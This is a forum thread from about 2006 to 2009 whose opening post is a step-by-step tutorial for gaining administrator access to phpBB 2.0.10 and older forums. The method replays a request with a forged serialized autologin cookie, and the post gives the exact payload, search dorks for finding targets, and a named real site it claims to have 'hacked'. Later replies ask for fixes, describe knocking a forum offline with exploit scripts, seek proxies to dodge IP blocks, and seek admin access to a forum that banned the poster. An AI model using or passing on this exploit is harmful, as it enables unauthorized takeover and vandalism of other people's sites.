|
Menu |
|
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
|
User Info |
|
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 172
Members: 0
Total: 172
|
|
|
|
|
|
Full disclosure |
|
|
|
|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
the most easy way to hack phpbb 2.0.10 and lower |
|
Posted: Wed Nov 01, 2006 4:18 pm |
|
|
devildad |
Beginner |
|
|
Joined: Nov 01, 2006 |
Posts: 1 |
|
|
|
|
|
|
|
First off you need to things:
FireFox: www.GetFireFox.com
Live HTTP Headers: http://livehttpheaders.mozdev.org/installation.html
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
Step 1:
Find a forum older than 2.0.13
Go to a Search like google.com or msn.com
Type in "Powered by phpBB 2.0.10"
Like so: http://www.google.ca/search?hl=en&q=powered+by+phpbb+2.0.10&btnG=Google+Search&meta=
Now i found: (at the moment i have already "hacked" this one.)
http://www.simcraft.com/phpBB2
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
Step 2:
Open the site you are going to hack in a new window.
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
Step 3:
Open "Live HTTP Headers" in Tools
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
Step 4:
Refresh the page (the site you are going to hack)
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
Step 5:
Now if you go to "Live HTTP Headers" you will see some text.
Scroll to the top you will see:
------------------------------
Host: simcraft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.Cool Gecko/20050511 Firefox/1.0.4
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://simcraft.com/phpBB2/index.php
Cookie: phpbb2mysql_data=a%3A0%3A%7B%7D; phpbb2mysql_sid=8167c889f5611d3d0e5272ec4d53d230
------------------------------
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
Step 6:
Select the line:
Cookie: phpbb2mysql_data=a%3A0%3A%7B%7D; phpbb2mysql_sid=8167c889f5611d3d0e5272ec4d53d230
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
Step 7:
Replace "a%3A0%3A%7B%7D" by "a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D"
also remove "; phpbb2mysql_sid=8167c889f5611d3d0e5272ec4d53d230"
and click "Replay..."
It sould look like this:
------------------------------
Host: simcraft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.Cool Gecko/20050511 Firefox/1.0.4
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://simcraft.com/phpBB2/index.php
Cookie: phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D
------------------------------
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
Step 8:
Click "Replay"
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
Step 9:
Now you will see "Go to Administration Panel" at the buttom of the page.
Now, sit down and f**k up the forum.
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
__________________________________________________________________
i read this toturial some where may b in this forum <<<<<< i need help i had reached go to admin panel button many forums using this but every time site show login page to login as admin???
how can i find md5 has n admin name ()means fuck forum() using this toturial
______________________all site fucker like to fuck sites _____________
__________________DEVILD@D_____________________________ |
|
|
|
|
|
|
|
|
Posted: Wed Nov 08, 2006 5:35 am |
|
|
brown_turd |
Beginner |
|
|
Joined: Nov 08, 2006 |
Posts: 3 |
|
|
|
|
|
|
|
It brings up the admin link fine, but then it goes to the login form.
Any suggestions? |
|
|
|
|
Posted: Thu Nov 09, 2006 5:44 am |
|
|
y3dips |
Valuable expert |
|
|
Joined: Feb 25, 2005 |
Posts: 281 |
Location: Indonesia |
|
|
|
|
|
|
brown_turd wrote: | It brings up the admin link fine, but then it goes to the login form.
Any suggestions? |
means the forum already patched up,
find another way in |
|
_________________ IO::y3dips->new(http://clog.ammar.web.id); |
|
|
|
Posted: Thu Nov 09, 2006 6:09 am |
|
|
brown_turd |
Beginner |
|
|
Joined: Nov 08, 2006 |
Posts: 3 |
|
|
|
|
|
|
|
I figured that.....
I was able to bring down the forum for a few hours with some of milworm's Perl scripts, but now my IP range has been blocked so I'll need a proxy for running Perl scripts.
Do such things exist?
(Yes I've searched around but didn't find much) |
|
|
|
|
Posted: Sat Nov 18, 2006 11:09 am |
|
|
Snake-Bite |
Regular user |
|
|
Joined: Nov 18, 2006 |
Posts: 8 |
|
|
|
|
|
|
|
Cool..
Anyone know of any phpBB 2.0.10 forums left? |
|
|
|
|
Posted: Thu May 10, 2007 4:00 pm |
|
|
Eekam |
Regular user |
|
|
Joined: Apr 25, 2007 |
Posts: 13 |
Location: Eesti, Tartu |
|
|
|
|
|
|
But my phpbb2.10 has cookie line like this:
Cookie: phpbb2mysql_sid=9d2cd0b4f50d7e40de99a8d09b58ac48; ea1b775a903ddbc1cbf2ccb6100ed9cc=-; phpbb2mysql_sid=4225bae3872bf77d1220d908952c9824 |
|
|
|
|
|
Stronger search with more legitimate results.. |
|
Posted: Mon Nov 03, 2008 4:01 am |
|
|
bundyxc |
Beginner |
|
|
Joined: Nov 03, 2008 |
Posts: 1 |
|
|
|
|
|
|
|
|
|
|
|
|
forum hack |
|
Posted: Thu Sep 03, 2009 4:14 pm |
|
|
psychobabble |
Beginner |
|
|
Joined: Sep 03, 2009 |
Posts: 1 |
|
|
|
|
|
|
|
When I use Live HTTP Headers
I get this:
Cookie: login_popup_closed=1; __utma=231365128.1212723634.1251974478.1251975361.1251983222.3; __utmz=231365128.1251983222.3.3.utmcsr=spiritualistchatroom.forumotion.com|utmccn=(referral)|utmcmd=referral|utmcct=/login.forum; __utmc=231365128
As Im a Complete NOVICE I assume its not a phpbb site?
Could do with a tip as I want to get in as admin to change a few bits as they banned me for being confrontational !
|
|
|
|
|
www.waraxe.us Forum Index -> PhpBB
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|